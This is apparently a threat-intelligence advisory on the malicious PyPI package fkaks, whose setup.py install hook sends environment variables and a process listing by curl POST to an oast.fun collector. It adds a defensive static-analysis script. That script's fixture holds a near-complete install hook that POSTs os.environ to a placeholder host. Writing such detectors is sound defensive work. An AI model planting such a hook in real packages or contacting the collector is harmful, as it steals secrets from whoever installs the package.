Supply-chain threat intelligence

Incident detail

critical · pypi · typosquatting · osv

Malicious code in fkaks (PyPI)

fkaks

Risk score

92

AI summary

Indexed incident for fkaks (pypi).

Description

fkaks 0.0.1 ships a setup.py that overrides the install and egg_info commands so that any pip install or pip download of the package unconditionally executes a curl POST to a hardcoded out-of-band collector at http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun. The POST body is built by iterating the entire os.environ mapping (env_vars_string = "&".join([f"{key}={value}" for key, value in env_vars.items()])) and concatenating it with the output of ps -elf, harvesting whatever secrets the installer or CI host holds in environment variables (cloud credentials such as AWS_*, GitHub or registry tokens, CI secrets, SSH agent paths) together with a full process listing. The transport is plaintext HTTP to an interactsh-style oast.fun subdomain, infrastructure typical of out-of-band exfiltration callbacks. The README's framing of the package as a demo of automatic code execution on pip install does not change the on-the-wire behaviour: every host that installs the package is affected.

During installation, the package exfiltrates environment variables.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

  • The package overrides the install command in setup.py to execute malicious code during installation.

  • exfiltration-env-variables

  • typosquatting
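The install-hook pattern described above can be triaged statically, without ever executing the setup.py. The following is an added example (my own code, not the advisory's or the package's; the fixture and the collector.invalid URL are constructed): it parses a setup.py with ast and flags cmdclass overrides of install or egg_info that are combined with os.environ access and exec or network calls.

```python
import ast

# Setuptools commands that run automatically on `pip install` / `pip download`.
HOOKED_COMMANDS = {"install", "egg_info", "develop", "build_py"}
# Identifiers or strings that indicate execution or network activity inside a hook.
EXEC_NAMES = {"subprocess", "system", "popen", "urlopen", "curl", "wget", "socket", "requests"}

# Constructed fixture mirroring the described pattern (placeholder collector URL, not a real host).
SAMPLE_SETUP_PY = '''
import os, subprocess
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        payload = "&".join(f"{k}={v}" for k, v in os.environ.items())
        subprocess.run(["curl", "-X", "POST", "-d", payload, "http://collector.invalid/x"])
        install.run(self)

setup(name="example-pkg", version="0.0.1", cmdclass={"install": PostInstall})
'''


def _idents(node):
    """Yield identifiers, attribute names and string constants found in a subtree."""
    for n in ast.walk(node):
        if isinstance(n, ast.Name):
            yield n.id
        elif isinstance(n, ast.Attribute):
            yield n.attr
        elif isinstance(n, ast.Constant) and isinstance(n.value, str):
            yield n.value


def analyze_setup_py(source):
    """Statically triage a setup.py; returns findings and never executes the file."""
    tree = ast.parse(source)
    f = {"hooked_commands": [], "env_access": False, "exec_or_network": [], "risky": False}
    for node in ast.walk(tree):
        # Record which lifecycle commands the setup() call overrides via cmdclass={...}.
        if isinstance(node, ast.Call):
            fn = getattr(node.func, "id", None) or getattr(node.func, "attr", None)
            for kw in node.keywords if fn == "setup" else []:
                if kw.arg == "cmdclass" and isinstance(kw.value, ast.Dict):
                    f["hooked_commands"] += [k.value for k in kw.value.keys
                                             if isinstance(k, ast.Constant) and k.value in HOOKED_COMMANDS]
        # Inspect subclasses of a hooked command for env harvesting and exec/network calls.
        elif isinstance(node, ast.ClassDef) and any(
                (getattr(b, "id", None) or getattr(b, "attr", None)) in HOOKED_COMMANDS for b in node.bases):
            ids = set(_idents(node))
            f["env_access"] |= "environ" in ids
            f["exec_or_network"] += sorted(i for i in ids if i.lower() in EXEC_NAMES
                                           or i.lower().startswith(("http://", "https://")))
    f["risky"] = bool(f["hooked_commands"]) and (f["env_access"] or bool(f["exec_or_network"]))
    return f
```

Run it over every setup.py extracted from a wheel or sdist before it is installed; a hooked command with neither env access nor exec/network signals is reported but not marked risky, which keeps legitimate build hooks out of the alert queue.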

Technical details

Affected versions

=0.0.1

Indicators

  • affected version=0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
